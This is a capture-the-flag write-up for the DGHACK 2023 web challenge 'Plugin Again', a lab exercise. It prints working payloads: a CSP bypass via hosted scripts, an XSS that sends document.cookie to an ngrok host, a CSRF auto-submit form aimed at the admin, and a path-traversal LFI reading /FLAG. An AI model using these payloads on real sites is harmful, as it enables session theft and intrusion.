Home CTFs | DGHACK_2023 | Web | Plugin Again
Post
Cancel

CTFs | DGHACK_2023 | Web | Plugin Again

Posted Nov 30, 2023 Updated Dec 4, 2023
By Bat
3 min read

Plugin Again

image

As written in the description of the challenge, we need to read the content of the /FLAG file. We only have access to a URL so we can navigate to the website and we get this:

image

First thing I notice was that there is a menu to see which user is connected:

image

Now that we know that Johnny and admin are connected, the first thing that came to my mind was XSS. If we can run XSS on the website, we can recover both session cookies and so, get authenticated. But if we try some basic XSS, we don’t get any result. This is due to the CSP located in the meta tag of the HTML:

image

This header tells us that we can’t run JavaScript code except from the domain cdn.jsdelivr.net. This may not allow us to get our XSS, but after a bit of digging, I found this. Here we see that we can run JavaScript code like the well-known alert(1).

It is recommended to run alert(document.domain) or alert(window.origin) to see if we are executing the script from the current webpage or from a sandbox. More explanation in the LiveOverflow video here.

So now we can try a basic XSS like this one:

image

And we get the following result:

image

As we can see, the domain is the same as our URL. We can now perform an XSS to recover a cookie. I used this really basic payload :

1
2
3

<script src="https://cdn.jsdelivr.net/npm/csp-bypass@1.0.2/dist/sval-classic.min.js"></script>
<script src="https://unpkg.com/csp-bypass@1.0.2-0/dist/classic.js"></script>
<br csp="fetch('https://4542-195-221-38-254.ngrok-free.app?COOKIE='+document.cookie)">

Don’t forget to launch a python (python3 -m http.server) server with an ngrok (ngrok http 8000) to be able to recover the cookie.

After a few seconds, we get this result:

image

We can create a cookie named session and set the value to the one we just got. Now we are connected as Johnny:

image

After a while, I couldn’t get any other cookie than the one from Johnny… The admin doesn’t seem to look often the blog posts… After reading the posts on the blog, we can see a message from the admin talking about sending messages to other users. And now if we look at the connected users, we get a new option, we can contact them:

image

But when I send the cookie grabber payload (the one from earlier), I can’t interact with the admin options because I am not on the local machine:

image

So we need to find a way to ask the admin to do the work for us… If we look at the post, we find this interesting one:

image

We then go on GitHub and search for this JhonnyTemplater and we find this code. We notice that there is a possible LFI here:

image

We now reaaaaalllly want to enable this plugin. As Johnny, we can go to the plugin menu and see that the activate button redirects to /activate-plugin/1:

image

I tried to redirect the admin using document.location or window.open but without any result… I then found online some people that send a form to another user and use JavaScript to automatically complete it. So I used the following payload:

1
2
3
4
5
6
7

<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="/activate-plugin/1" method="GET">
  <input type="submit" value="Submit request" />
</form>
<script src="https://cdn.jsdelivr.net/npm/csp-bypass@1.0.2/dist/sval-classic.min.js"></script>
<script src="https://unpkg.com/csp-bypass@1.0.2-0/dist/classic.js"></script>
<br csp="document.getElementById('csrf-form').submit()">

This will basically just send a form with just a submit button to the admin user and when he opens the message it will automatically redirect him to /activate/1 which will activate the plugin.

I first used action=http://website-ybnx6z.inst.malicecyber.com/activate-plugin/1. This worked when I sent the message to myself (Johnny) but not to the admin.

We can now see that we have activated the plugin because we can deactivate it now:

image

Now, we can create a post with a template:

image

If we intercept the request with BurpSuite when we click on Use template, we can see this:

image

We can now replace the theme=funny by theme=../../../../../../../FLAG and now…

image

So the flag is DGHACK{WellD0ne!Bl0ggingIsS0metimeRisky}.

We could have tried to get RCE. Indeed, the server is using Flask and the Werkzeug console (more info here). We could have recovered the information in the different files on the server to find the PIN and get RCE in the Werkzeug console.

CTFs, DGHACK_2023, Web
Web LFI XSS
This post is licensed under CC BY 4.0 by the author.
Recently Updated